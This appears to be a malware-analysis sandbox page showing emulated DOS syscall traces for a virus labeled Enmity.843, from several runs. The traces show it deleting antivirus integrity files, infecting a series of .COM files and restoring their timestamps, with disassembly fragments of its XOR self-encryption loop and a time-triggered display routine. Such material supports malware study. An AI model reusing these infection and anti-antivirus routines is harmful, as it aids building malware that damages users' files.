Sample viewer

vx.netlux.org/Virus.DOS.Enmity.843

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:00:39.485902466Z 26 PC: 12a7e | Set disk transfer address
2018-12-17T22:00:39.487881341Z 71 PC: 12a88 | Get current directory
2018-12-17T22:00:39.490767683Z 67 PC: 12cf2 | Get or set file attributes
2018-12-17T22:00:39.496386723Z 65 PC: 12cf6 | Delete file (Filename = 'ANTI-VIR.DAT')
2018-12-17T22:00:39.502660124Z 67 PC: 12cf2 | Get or set file attributes
2018-12-17T22:00:39.50947265Z 65 PC: 12cf6 | Delete file (Filename = 'CHKLIST.MS')
2018-12-17T22:00:39.519190395Z 67 PC: 12cf2 | Get or set file attributes
2018-12-17T22:00:39.530552216Z 65 PC: 12cf6 | Delete file (Filename = 'CHKLIST.CPS')
2018-12-17T22:00:39.539258032Z 67 PC: 12cf2 | Get or set file attributes
2018-12-17T22:00:39.54606137Z 65 PC: 12cf6 | Delete file (Filename = 'IVB.NTZ')
2018-12-17T22:00:39.552894282Z 78 PC: 12a90 | Find first file
2018-12-17T22:00:39.559652928Z 67 PC: 12bb0 | Get or set file attributes
2018-12-17T22:00:39.575744323Z 61 PC: 12bc5 | Open file (Filename = 'SLEEP.COM')
2018-12-17T22:00:39.582981294Z 63 PC: 12bda | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:00:39.592077188Z 66 PC: 12c12 | Move file pointer
2018-12-17T22:00:39.593421643Z 63 PC: 12c29 | Read file or device (Read 7 bytes on handle 5)
2018-12-17T22:00:39.595747191Z 44 PC: 12c3d | Get time 0x12c3d: mov word ptr [bp + 0x42d], dx
0x12c41: mov cx, 0x15
0x12c44: lea dx, word ptr [bp + 0x105]
0x12c48: pop ax
0x12c49: int 0x21
0x12c4b: push ax
0x12c4c: push bp
0x12c4d: mov bp, sp
0x12c4f: mov word ptr [bp + 2], 0x4001
0x12c54: pop bp
0x12c55: mov cx, 0x18a
0x12c58: mov dx, word ptr [bp + 0x42d]
0x12c5c: lea si, word ptr [bp + 0x11a]
0x12c60: lea di, word ptr [bp + 0x505]
0x12c64: lodsw ax, word ptr [si]
0x12c65: xor ax, dx
0x12c67: stosw word ptr es:[di], ax
0x12c68: loop 0x12c64
0x12c6a: mov cx, 0x313
0x12c6d: lea dx, word ptr [bp + 0x505]
2018-12-17T22:00:39.599061263Z 64 PC: 12c4b | Write file or device (Write 21 bytes on handle 5)
2018-12-17T22:00:39.602276857Z 64 PC: 12c7f | Write file or device (Write 787 bytes on handle 5)
2018-12-17T22:00:39.611732Z 64 PC: 12c89 | Write file or device (Write 35 bytes on handle 5)
2018-12-17T22:00:39.615483821Z 66 PC: 12c9b | Move file pointer
2018-12-17T22:00:39.617174895Z 64 PC: 12ca5 | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:00:39.623758364Z 87 PC: 12cba | Get or set file date and time
2018-12-17T22:00:39.625766276Z 62 PC: 12cbe | Close file
2018-12-17T22:00:39.640231295Z 67 PC: 12ccd | Get or set file attributes
2018-12-17T22:00:39.644912188Z 79 PC: 12a90 | Find next file
2018-12-17T22:00:39.648018557Z 79 PC: 12a90 | Find next file
2018-12-17T22:00:39.650979279Z 67 PC: 12bb0 | Get or set file attributes
2018-12-17T22:00:39.66078591Z 61 PC: 12bc5 | Open file (Filename = 'PRINT.COM')
2018-12-17T22:00:39.668016592Z 63 PC: 12bda | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:00:39.67465672Z 66 PC: 12c12 | Move file pointer
2018-12-17T22:00:39.676504187Z 63 PC: 12c29 | Read file or device (Read 7 bytes on handle 5)
2018-12-17T22:00:39.679965036Z 44 PC: 12c3d | Get time 0x12c3d: mov word ptr [bp + 0x42d], dx
0x12c41: mov cx, 0x15
0x12c44: lea dx, word ptr [bp + 0x105]
0x12c48: pop ax
0x12c49: int 0x21
0x12c4b: push ax
0x12c4c: push bp
0x12c4d: mov bp, sp
0x12c4f: mov word ptr [bp + 2], 0x4001
0x12c54: pop bp
0x12c55: mov cx, 0x18a
0x12c58: mov dx, word ptr [bp + 0x42d]
0x12c5c: lea si, word ptr [bp + 0x11a]
0x12c60: lea di, word ptr [bp + 0x505]
0x12c64: lodsw ax, word ptr [si]
0x12c65: xor ax, dx
0x12c67: stosw word ptr es:[di], ax
0x12c68: loop 0x12c64
0x12c6a: mov cx, 0x313
0x12c6d: lea dx, word ptr [bp + 0x505]
2018-12-17T22:00:39.683447618Z 64 PC: 12c4b | Write file or device (Write 21 bytes on handle 5)
2018-12-17T22:00:39.686637988Z 64 PC: 12c7f | Write file or device (Write 787 bytes on handle 5)
2018-12-17T22:00:39.694398391Z 64 PC: 12c89 | Write file or device (Write 35 bytes on handle 5)
2018-12-17T22:00:39.698143473Z 66 PC: 12c9b | Move file pointer
2018-12-17T22:00:39.700028564Z 64 PC: 12ca5 | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:00:39.706622198Z 87 PC: 12cba | Get or set file date and time
2018-12-17T22:00:39.708890951Z 62 PC: 12cbe | Close file
2018-12-17T22:00:39.717392087Z 67 PC: 12ccd | Get or set file attributes
2018-12-17T22:00:39.722105078Z 79 PC: 12a90 | Find next file
2018-12-17T22:00:39.727696027Z 67 PC: 12bb0 | Get or set file attributes
2018-12-17T22:00:39.738603803Z 61 PC: 12bc5 | Open file (Filename = 'HELLO.COM')
2018-12-17T22:00:39.746663522Z 63 PC: 12bda | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:00:39.762368315Z 66 PC: 12c12 | Move file pointer
2018-12-17T22:00:39.76393106Z 63 PC: 12c29 | Read file or device (Read 7 bytes on handle 5)
2018-12-17T22:00:39.768697533Z 44 PC: 12c3d | Get time 0x12c3d: mov word ptr [bp + 0x42d], dx
0x12c41: mov cx, 0x15
0x12c44: lea dx, word ptr [bp + 0x105]
0x12c48: pop ax
0x12c49: int 0x21
0x12c4b: push ax
0x12c4c: push bp
0x12c4d: mov bp, sp
0x12c4f: mov word ptr [bp + 2], 0x4001
0x12c54: pop bp
0x12c55: mov cx, 0x18a
0x12c58: mov dx, word ptr [bp + 0x42d]
0x12c5c: lea si, word ptr [bp + 0x11a]
0x12c60: lea di, word ptr [bp + 0x505]
0x12c64: lodsw ax, word ptr [si]
0x12c65: xor ax, dx
0x12c67: stosw word ptr es:[di], ax
0x12c68: loop 0x12c64
0x12c6a: mov cx, 0x313
0x12c6d: lea dx, word ptr [bp + 0x505]
2018-12-17T22:00:39.782390564Z 64 PC: 12c4b | Write file or device (Write 21 bytes on handle 5)
2018-12-17T22:00:39.785254782Z 64 PC: 12c7f | Write file or device (Write 787 bytes on handle 5)
2018-12-17T22:00:39.792984381Z 64 PC: 12c89 | Write file or device (Write 35 bytes on handle 5)
2018-12-17T22:00:39.795874279Z 66 PC: 12c9b | Move file pointer
2018-12-17T22:00:39.797649225Z 64 PC: 12ca5 | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:00:39.803923357Z 87 PC: 12cba | Get or set file date and time
2018-12-17T22:00:39.805596566Z 62 PC: 12cbe | Close file
2018-12-17T22:00:39.813581675Z 67 PC: 12ccd | Get or set file attributes
2018-12-17T22:00:39.818490193Z 79 PC: 12a90 | Find next file
2018-12-17T22:00:39.821745415Z 67 PC: 12bb0 | Get or set file attributes
2018-12-17T22:00:39.832912838Z 61 PC: 12bc5 | Open file (Filename = 'PHANG.COM')
2018-12-17T22:00:39.839761273Z 63 PC: 12bda | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:00:39.846370714Z 66 PC: 12c12 | Move file pointer
2018-12-17T22:00:39.8491602Z 63 PC: 12c29 | Read file or device (Read 7 bytes on handle 5)
2018-12-17T22:00:39.851868087Z 44 PC: 12c3d | Get time 0x12c3d: mov word ptr [bp + 0x42d], dx
0x12c41: mov cx, 0x15
0x12c44: lea dx, word ptr [bp + 0x105]
0x12c48: pop ax
0x12c49: int 0x21
0x12c4b: push ax
0x12c4c: push bp
0x12c4d: mov bp, sp
0x12c4f: mov word ptr [bp + 2], 0x4001
0x12c54: pop bp
0x12c55: mov cx, 0x18a
0x12c58: mov dx, word ptr [bp + 0x42d]
0x12c5c: lea si, word ptr [bp + 0x11a]
0x12c60: lea di, word ptr [bp + 0x505]
0x12c64: lodsw ax, word ptr [si]
0x12c65: xor ax, dx
0x12c67: stosw word ptr es:[di], ax
0x12c68: loop 0x12c64
0x12c6a: mov cx, 0x313
0x12c6d: lea dx, word ptr [bp + 0x505]
2018-12-17T22:00:39.854283819Z 64 PC: 12c4b | Write file or device (Write 21 bytes on handle 5)
2018-12-17T22:00:39.858363524Z 64 PC: 12c7f | Write file or device (Write 787 bytes on handle 5)
2018-12-17T22:00:39.866497586Z 64 PC: 12c89 | Write file or device (Write 35 bytes on handle 5)
2018-12-17T22:00:39.869437046Z 66 PC: 12c9b | Move file pointer
2018-12-17T22:00:39.871979219Z 64 PC: 12ca5 | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:00:39.878690754Z 87 PC: 12cba | Get or set file date and time
2018-12-17T22:00:39.881253557Z 62 PC: 12cbe | Close file
2018-12-17T22:00:39.890820577Z 67 PC: 12ccd | Get or set file attributes
2018-12-17T22:00:39.898519806Z 79 PC: 12a90 | Find next file
2018-12-17T22:00:39.904336738Z 67 PC: 12bb0 | Get or set file attributes
2018-12-17T22:00:39.917056459Z 61 PC: 12bc5 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T22:00:39.924323334Z 63 PC: 12bda | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:00:39.93077513Z 66 PC: 12c12 | Move file pointer
2018-12-17T22:00:39.933251935Z 63 PC: 12c29 | Read file or device (Read 7 bytes on handle 5)
2018-12-17T22:00:39.935795552Z 44 PC: 12c3d | Get time 0x12c3d: mov word ptr [bp + 0x42d], dx
0x12c41: mov cx, 0x15
0x12c44: lea dx, word ptr [bp + 0x105]
0x12c48: pop ax
0x12c49: int 0x21
0x12c4b: push ax
0x12c4c: push bp
0x12c4d: mov bp, sp
0x12c4f: mov word ptr [bp + 2], 0x4001
0x12c54: pop bp
0x12c55: mov cx, 0x18a
0x12c58: mov dx, word ptr [bp + 0x42d]
0x12c5c: lea si, word ptr [bp + 0x11a]
0x12c60: lea di, word ptr [bp + 0x505]
0x12c64: lodsw ax, word ptr [si]
0x12c65: xor ax, dx
0x12c67: stosw word ptr es:[di], ax
0x12c68: loop 0x12c64
0x12c6a: mov cx, 0x313
0x12c6d: lea dx, word ptr [bp + 0x505]
2018-12-17T22:00:39.938079032Z 64 PC: 12c4b | Write file or device (Write 21 bytes on handle 5)
2018-12-17T22:00:39.942872748Z 64 PC: 12c7f | Write file or device (Write 787 bytes on handle 5)
2018-12-17T22:00:39.951528824Z 64 PC: 12c89 | Write file or device (Write 35 bytes on handle 5)
2018-12-17T22:00:39.954301033Z 66 PC: 12c9b | Move file pointer
2018-12-17T22:00:39.956573175Z 64 PC: 12ca5 | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:00:39.963288244Z 87 PC: 12cba | Get or set file date and time
2018-12-17T22:00:39.965027691Z 62 PC: 12cbe | Close file
2018-12-17T22:00:39.9730258Z 67 PC: 12ccd | Get or set file attributes
2018-12-17T22:00:39.978062655Z 79 PC: 12a90 | Find next file
2018-12-17T22:00:39.980936812Z 67 PC: 12bb0 | Get or set file attributes
2018-12-17T22:00:39.990959214Z 61 PC: 12bc5 | Open file (Filename = 'MANDEL.COM')
2018-12-17T22:00:39.997905643Z 63 PC: 12bda | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:00:40.004355452Z 66 PC: 12c12 | Move file pointer
2018-12-17T22:00:40.006212049Z 63 PC: 12c29 | Read file or device (Read 7 bytes on handle 5)
2018-12-17T22:00:40.00895222Z 44 PC: 12c3d | Get time 0x12c3d: mov word ptr [bp + 0x42d], dx
0x12c41: mov cx, 0x15
0x12c44: lea dx, word ptr [bp + 0x105]
0x12c48: pop ax
0x12c49: int 0x21
0x12c4b: push ax
0x12c4c: push bp
0x12c4d: mov bp, sp
0x12c4f: mov word ptr [bp + 2], 0x4001
0x12c54: pop bp
0x12c55: mov cx, 0x18a
0x12c58: mov dx, word ptr [bp + 0x42d]
0x12c5c: lea si, word ptr [bp + 0x11a]
0x12c60: lea di, word ptr [bp + 0x505]
0x12c64: lodsw ax, word ptr [si]
0x12c65: xor ax, dx
0x12c67: stosw word ptr es:[di], ax
0x12c68: loop 0x12c64
0x12c6a: mov cx, 0x313
0x12c6d: lea dx, word ptr [bp + 0x505]
2018-12-17T22:00:40.011320719Z 64 PC: 12c4b | Write file or device (Write 21 bytes on handle 5)
2018-12-17T22:00:40.020804789Z 64 PC: 12c7f | Write file or device (Write 787 bytes on handle 5)
2018-12-17T22:00:40.029080885Z 64 PC: 12c89 | Write file or device (Write 35 bytes on handle 5)
2018-12-17T22:00:40.031962542Z 66 PC: 12c9b | Move file pointer
2018-12-17T22:00:40.033905228Z 64 PC: 12ca5 | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:00:40.04112257Z 87 PC: 12cba | Get or set file date and time
2018-12-17T22:00:40.043579762Z 62 PC: 12cbe | Close file
2018-12-17T22:00:40.051795593Z 67 PC: 12ccd | Get or set file attributes
2018-12-17T22:00:40.057283363Z 79 PC: 12a90 | Find next file
2018-12-17T22:00:40.060158645Z 67 PC: 12bb0 | Get or set file attributes
2018-12-17T22:00:40.070025221Z 61 PC: 12bc5 | Open file (Filename = 'PAH.COM')
2018-12-17T22:00:40.077749616Z 63 PC: 12bda | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:00:40.084760133Z 66 PC: 12c12 | Move file pointer
2018-12-17T22:00:40.086259376Z 63 PC: 12c29 | Read file or device (Read 7 bytes on handle 5)
2018-12-17T22:00:40.089708729Z 44 PC: 12c3d | Get time 0x12c3d: mov word ptr [bp + 0x42d], dx
0x12c41: mov cx, 0x15
0x12c44: lea dx, word ptr [bp + 0x105]
0x12c48: pop ax
0x12c49: int 0x21
0x12c4b: push ax
0x12c4c: push bp
0x12c4d: mov bp, sp
0x12c4f: mov word ptr [bp + 2], 0x4001
0x12c54: pop bp
0x12c55: mov cx, 0x18a
0x12c58: mov dx, word ptr [bp + 0x42d]
0x12c5c: lea si, word ptr [bp + 0x11a]
0x12c60: lea di, word ptr [bp + 0x505]
0x12c64: lodsw ax, word ptr [si]
0x12c65: xor ax, dx
0x12c67: stosw word ptr es:[di], ax
0x12c68: loop 0x12c64
0x12c6a: mov cx, 0x313
0x12c6d: lea dx, word ptr [bp + 0x505]
2018-12-17T22:00:40.092278157Z 64 PC: 12c4b | Write file or device (Write 21 bytes on handle 5)
2018-12-17T22:00:40.095289841Z 64 PC: 12c7f | Write file or device (Write 787 bytes on handle 5)
2018-12-17T22:00:40.104694926Z 64 PC: 12c89 | Write file or device (Write 35 bytes on handle 5)
2018-12-17T22:00:40.10754593Z 66 PC: 12c9b | Move file pointer
2018-12-17T22:00:40.11038179Z 64 PC: 12ca5 | Write file or device (Write 5 bytes on handle 5)
2018-12-17T22:00:40.118355743Z 87 PC: 12cba | Get or set file date and time
2018-12-17T22:00:40.120054805Z 62 PC: 12cbe | Close file
2018-12-17T22:00:40.129661358Z 67 PC: 12ccd | Get or set file attributes
2018-12-17T22:00:40.13522478Z 79 PC: 12a90 | Find next file
2018-12-17T22:00:40.138019285Z 67 PC: 12bb0 | Get or set file attributes
2018-12-17T22:00:40.149050837Z 61 PC: 12bc5 | Open file (Filename = 'TEST.COM')
2018-12-17T22:00:40.158132425Z 63 PC: 12bda | Read file or device (Read 5 bytes on handle 5)
2018-12-17T22:00:40.165511343Z 87 PC: 12cba | Get or set file date and time
2018-12-17T22:00:40.167224784Z 62 PC: 12cbe | Close file
2018-12-17T22:00:40.175992624Z 67 PC: 12ccd | Get or set file attributes
2018-12-17T22:00:40.181694929Z 79 PC: 12a90 | Find next file
2018-12-17T22:00:40.184491844Z 59 PC: 12aa4 | Change current directory
2018-12-17T22:00:40.189610566Z 71 PC: 12ac7 | Get current directory
2018-12-17T22:00:40.193015838Z 59 PC: 12afa | Change current directory
2018-12-17T22:00:40.203178043Z 59 PC: 12b1b | Change current directory
2018-12-17T22:00:40.205908269Z 44 PC: 12b1f | Get time 0x12b1f: cmp dx, 5
0x12b22: ja 0x12b4c
0x12b24: nop
0x12b25: nop
0x12b26: nop
0x12b27: mov ax, 0xd
0x12b2a: int 0x10
0x12b2c: lea si, word ptr [bp + 0x3c2]
0x12b30: cld
0x12b31: lodsb al, byte ptr [si]
0x12b32: or al, al
0x12b34: je 0x12b43
0x12b36: nop
0x12b37: nop
0x12b38: nop
0x12b39: mov ah, 0xe
0x12b3b: xor bh, bh
0x12b3d: mov bl, 5
0x12b3f: int 0x10
0x12b41: jmp 0x12b30
2018-12-17T22:00:40.208640207Z 26 PC: 12b5c | Set disk transfer address

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":1188,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:42:59.08826263Z 26 PC: 12a7e | Set disk transfer address
2018-12-25T11:42:59.09528716Z 71 PC: 12a88 | Get current directory
2018-12-25T11:42:59.098611487Z 67 PC: 12cf2 | Get or set file attributes
2018-12-25T11:42:59.105105795Z 65 PC: 12cf6 | Delete file (Filename = 'ANTI-VIR.DAT')
2018-12-25T11:42:59.111431273Z 67 PC: 12cf2 | Get or set file attributes (See above)
2018-12-25T11:42:59.11783053Z 65 PC: 12cf6 | Delete file (See above)
2018-12-25T11:42:59.130411417Z 67 PC: 12cf2 | Get or set file attributes (See above)
2018-12-25T11:42:59.134305994Z 65 PC: 12cf6 | Delete file (See above)
2018-12-25T11:42:59.138683732Z 67 PC: 12cf2 | Get or set file attributes (See above)
2018-12-25T11:42:59.144697559Z 65 PC: 12cf6 | Delete file (See above)
2018-12-25T11:42:59.150698235Z 78 PC: 12a90 | Find first file
2018-12-25T11:42:59.162476217Z 67 PC: 12bb0 | Get or set file attributes
2018-12-25T11:42:59.814895274Z 61 PC: 12bc5 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:42:59.828552749Z 63 PC: 12bda | Read file or device (Read 5 bytes on handle 5)
2018-12-25T11:42:59.836380872Z 66 PC: 12c12 | Move file pointer
2018-12-25T11:42:59.841097719Z 63 PC: 12c29 | Read file or device (Read 7 bytes on handle 5)
2018-12-25T11:42:59.843604671Z 44 PC: 12c3d | Get time 0x12c3d: mov word ptr [bp + 0x42d], dx
0x12c41: mov cx, 0x15
0x12c44: lea dx, word ptr [bp + 0x105]
0x12c48: pop ax
0x12c49: int 0x21
0x12c4b: push ax
0x12c4c: push bp
0x12c4d: mov bp, sp
0x12c4f: mov word ptr [bp + 2], 0x4001
0x12c54: pop bp
0x12c55: mov cx, 0x18a
0x12c58: mov dx, word ptr [bp + 0x42d]
0x12c5c: lea si, word ptr [bp + 0x11a]
0x12c60: lea di, word ptr [bp + 0x505]
0x12c64: lodsw ax, word ptr [si]
0x12c65: xor ax, dx
0x12c67: stosw word ptr es:[di], ax
0x12c68: loop 0x12c64
0x12c6a: mov cx, 0x313
0x12c6d: lea dx, word ptr [bp + 0x505]
2018-12-25T11:42:59.846224687Z 64 PC: 12c4b | Write file or device (Write 21 bytes on handle 5)
2018-12-25T11:42:59.84954044Z 64 PC: 12c7f | Write file or device (Write 787 bytes on handle 5)
2018-12-25T11:42:59.858332846Z 64 PC: 12c89 | Write file or device (Write 35 bytes on handle 5)
2018-12-25T11:42:59.862649389Z 66 PC: 12c9b | Move file pointer
2018-12-25T11:42:59.864520018Z 64 PC: 12ca5 | Write file or device (Write 5 bytes on handle 5)
2018-12-25T11:42:59.874420563Z 87 PC: 12cba | Get or set file date and time
2018-12-25T11:42:59.877169687Z 62 PC: 12cbe | Close file
2018-12-25T11:42:59.892853368Z 67 PC: 12ccd | Get or set file attributes
2018-12-25T11:42:59.898220637Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:42:59.904553709Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:42:59.91026086Z 67 PC: 12bb0 | Get or set file attributes (See above)
2018-12-25T11:42:59.927685571Z 61 PC: 12bc5 | Open file (See above)
2018-12-25T11:42:59.93395516Z 63 PC: 12bda | Read file or device (See above)
2018-12-25T11:42:59.942022022Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T11:42:59.944748934Z 63 PC: 12c29 | Read file or device (See above)
2018-12-25T11:42:59.94880964Z 44 PC: 12c3d | Get time (See above)
2018-12-25T11:42:59.960310384Z 64 PC: 12c4b | Write file or device (See above)
2018-12-25T11:42:59.963758645Z 64 PC: 12c7f | Write file or device (See above)
2018-12-25T11:42:59.973311427Z 64 PC: 12c89 | Write file or device (See above)
2018-12-25T11:42:59.977392549Z 66 PC: 12c9b | Move file pointer (See above)
2018-12-25T11:42:59.979638117Z 64 PC: 12ca5 | Write file or device (See above)
2018-12-25T11:42:59.987295983Z 87 PC: 12cba | Get or set file date and time (See above)
2018-12-25T11:42:59.989498225Z 62 PC: 12cbe | Close file (See above)
2018-12-25T11:43:00.000046512Z 67 PC: 12ccd | Get or set file attributes (See above)
2018-12-25T11:43:00.005470262Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:43:00.01205026Z 67 PC: 12bb0 | Get or set file attributes (See above)
2018-12-25T11:43:00.024220897Z 61 PC: 12bc5 | Open file (See above)
2018-12-25T11:43:00.031949088Z 63 PC: 12bda | Read file or device (See above)
2018-12-25T11:43:00.039404842Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T11:43:00.041793299Z 63 PC: 12c29 | Read file or device (See above)
2018-12-25T11:43:00.044674257Z 44 PC: 12c3d | Get time (See above)
2018-12-25T11:43:00.047373201Z 64 PC: 12c4b | Write file or device (See above)
2018-12-25T11:43:00.051352349Z 64 PC: 12c7f | Write file or device (See above)
2018-12-25T11:43:00.060456747Z 64 PC: 12c89 | Write file or device (See above)
2018-12-25T11:43:00.063825218Z 66 PC: 12c9b | Move file pointer (See above)
2018-12-25T11:43:00.066692224Z 64 PC: 12ca5 | Write file or device (See above)
2018-12-25T11:43:00.074454945Z 87 PC: 12cba | Get or set file date and time (See above)
2018-12-25T11:43:00.076502498Z 62 PC: 12cbe | Close file (See above)
2018-12-25T11:43:00.08602338Z 67 PC: 12ccd | Get or set file attributes (See above)
2018-12-25T11:43:00.092268084Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:43:00.095633465Z 67 PC: 12bb0 | Get or set file attributes (See above)
2018-12-25T11:43:00.107924375Z 61 PC: 12bc5 | Open file (See above)
2018-12-25T11:43:00.116252616Z 63 PC: 12bda | Read file or device (See above)
2018-12-25T11:43:00.123921615Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T11:43:00.126202415Z 63 PC: 12c29 | Read file or device (See above)
2018-12-25T11:43:00.130421121Z 44 PC: 12c3d | Get time (See above)
2018-12-25T11:43:00.133254669Z 64 PC: 12c4b | Write file or device (See above)
2018-12-25T11:43:00.136946264Z 64 PC: 12c7f | Write file or device (See above)
2018-12-25T11:43:00.147285721Z 64 PC: 12c89 | Write file or device (See above)
2018-12-25T11:43:00.150660288Z 66 PC: 12c9b | Move file pointer (See above)
2018-12-25T11:43:00.152646514Z 64 PC: 12ca5 | Write file or device (See above)
2018-12-25T11:43:00.161727058Z 87 PC: 12cba | Get or set file date and time (See above)
2018-12-25T11:43:00.163875568Z 62 PC: 12cbe | Close file (See above)
2018-12-25T11:43:00.172881719Z 67 PC: 12ccd | Get or set file attributes (See above)
2018-12-25T11:43:00.179452067Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:43:00.183162047Z 67 PC: 12bb0 | Get or set file attributes (See above)
2018-12-25T11:43:00.194491588Z 61 PC: 12bc5 | Open file (See above)
2018-12-25T11:43:00.203088413Z 63 PC: 12bda | Read file or device (See above)
2018-12-25T11:43:00.210760028Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T11:43:00.2127684Z 63 PC: 12c29 | Read file or device (See above)
2018-12-25T11:43:00.216155664Z 44 PC: 12c3d | Get time (See above)
2018-12-25T11:43:00.219733761Z 64 PC: 12c4b | Write file or device (See above)
2018-12-25T11:43:00.224234254Z 64 PC: 12c7f | Write file or device (See above)
2018-12-25T11:43:00.233459518Z 64 PC: 12c89 | Write file or device (See above)
2018-12-25T11:43:00.237316585Z 66 PC: 12c9b | Move file pointer (See above)
2018-12-25T11:43:00.239218464Z 64 PC: 12ca5 | Write file or device (See above)
2018-12-25T11:43:00.246808969Z 87 PC: 12cba | Get or set file date and time (See above)
2018-12-25T11:43:00.249726364Z 62 PC: 12cbe | Close file (See above)
2018-12-25T11:43:00.258738105Z 67 PC: 12ccd | Get or set file attributes (See above)
2018-12-25T11:43:00.264360397Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:43:00.268967411Z 67 PC: 12bb0 | Get or set file attributes (See above)
2018-12-25T11:43:00.280085761Z 61 PC: 12bc5 | Open file (See above)
2018-12-25T11:43:00.287204853Z 63 PC: 12bda | Read file or device (See above)
2018-12-25T11:43:00.295159543Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T11:43:00.296488894Z 63 PC: 12c29 | Read file or device (See above)
2018-12-25T11:43:00.298375363Z 44 PC: 12c3d | Get time (See above)
2018-12-25T11:43:00.300778032Z 64 PC: 12c4b | Write file or device (See above)
2018-12-25T11:43:00.306590873Z 64 PC: 12c7f | Write file or device (See above)
2018-12-25T11:43:00.313575012Z 64 PC: 12c89 | Write file or device (See above)
2018-12-25T11:43:00.316797405Z 66 PC: 12c9b | Move file pointer (See above)
2018-12-25T11:43:00.318461256Z 64 PC: 12ca5 | Write file or device (See above)
2018-12-25T11:43:00.323508882Z 87 PC: 12cba | Get or set file date and time (See above)
2018-12-25T11:43:00.324944912Z 62 PC: 12cbe | Close file (See above)
2018-12-25T11:43:00.334064005Z 67 PC: 12ccd | Get or set file attributes (See above)
2018-12-25T11:43:00.340668478Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:43:00.34549264Z 67 PC: 12bb0 | Get or set file attributes (See above)
2018-12-25T11:43:00.359563603Z 61 PC: 12bc5 | Open file (See above)
2018-12-25T11:43:00.369698416Z 63 PC: 12bda | Read file or device (See above)
2018-12-25T11:43:00.377192413Z 66 PC: 12c12 | Move file pointer (See above)
2018-12-25T11:43:00.379693547Z 63 PC: 12c29 | Read file or device (See above)
2018-12-25T11:43:00.383050138Z 44 PC: 12c3d | Get time (See above)
2018-12-25T11:43:00.385616491Z 64 PC: 12c4b | Write file or device (See above)
2018-12-25T11:43:00.390042119Z 64 PC: 12c7f | Write file or device (See above)
2018-12-25T11:43:00.398971432Z 64 PC: 12c89 | Write file or device (See above)
2018-12-25T11:43:00.402028422Z 66 PC: 12c9b | Move file pointer (See above)
2018-12-25T11:43:00.404159571Z 64 PC: 12ca5 | Write file or device (See above)
2018-12-25T11:43:00.412346593Z 87 PC: 12cba | Get or set file date and time (See above)
2018-12-25T11:43:00.414448533Z 62 PC: 12cbe | Close file (See above)
2018-12-25T11:43:00.424781366Z 67 PC: 12ccd | Get or set file attributes (See above)
2018-12-25T11:43:00.430662381Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:43:00.43408075Z 67 PC: 12bb0 | Get or set file attributes (See above)
2018-12-25T11:43:00.445245446Z 61 PC: 12bc5 | Open file (See above)
2018-12-25T11:43:00.45347812Z 63 PC: 12bda | Read file or device (See above)
2018-12-25T11:43:00.461993117Z 87 PC: 12cba | Get or set file date and time (See above)
2018-12-25T11:43:00.463874029Z 62 PC: 12cbe | Close file (See above)
2018-12-25T11:43:00.474871229Z 67 PC: 12ccd | Get or set file attributes (See above)
2018-12-25T11:43:00.48662535Z 79 PC: 12a90 | Find next file (See above)
2018-12-25T11:43:00.495174104Z 59 PC: 12aa4 | Change current directory
2018-12-25T11:43:00.501199777Z 71 PC: 12ac7 | Get current directory
2018-12-25T11:43:00.505286221Z 59 PC: 12afa | Change current directory
2018-12-25T11:43:00.517367323Z 59 PC: 12b1b | Change current directory
2018-12-25T11:43:00.520658935Z 44 PC: 12b1f | Get time 0x12b1f: cmp dx, 5
0x12b22: ja 0x12b4c
0x12b24: nop
0x12b25: nop
0x12b26: nop
0x12b27: mov ax, 0xd
0x12b2a: int 0x10
0x12b2c: lea si, word ptr [bp + 0x3c2]
0x12b30: cld
0x12b31: lodsb al, byte ptr [si]
0x12b32: or al, al
0x12b34: je 0x12b43
0x12b36: nop
0x12b37: nop
0x12b38: nop
0x12b39: mov ah, 0xe
0x12b3b: xor bh, bh
0x12b3d: mov bl, 5
0x12b3f: int 0x10
0x12b41: jmp 0x12b30
2018-12-25T11:43:00.52389917Z 26 PC: 12b5c | Set disk transfer address

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":1188,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:42:59.35527812Z 26 PC: 12a7e | Set disk transfer address
2018-12-25T11:42:59.356728452Z 71 PC: 12a88 | Get current directory
2018-12-25T11:42:59.360738708Z 67 PC: 12cf2 | Get or set file attributes
2018-12-25T11:42:59.367150164Z 65 PC: 12cf6 | Delete file (Filename = 'ANTI-VIR.DAT')
2018-12-25T11:42:59.373551552Z 67 PC: 12cf2 | Get or set file attributes (See above)
2018-12-25T11:42:59.382764344Z 65 PC: 12cf6 | Delete file (See above)
2018-12-25T11:42:59.393719997Z 67 PC: 12cf2 | Get or set file attributes (See above)
2018-12-25T11:42:59.400548386Z 65 PC: 12cf6 | Delete file (See above)
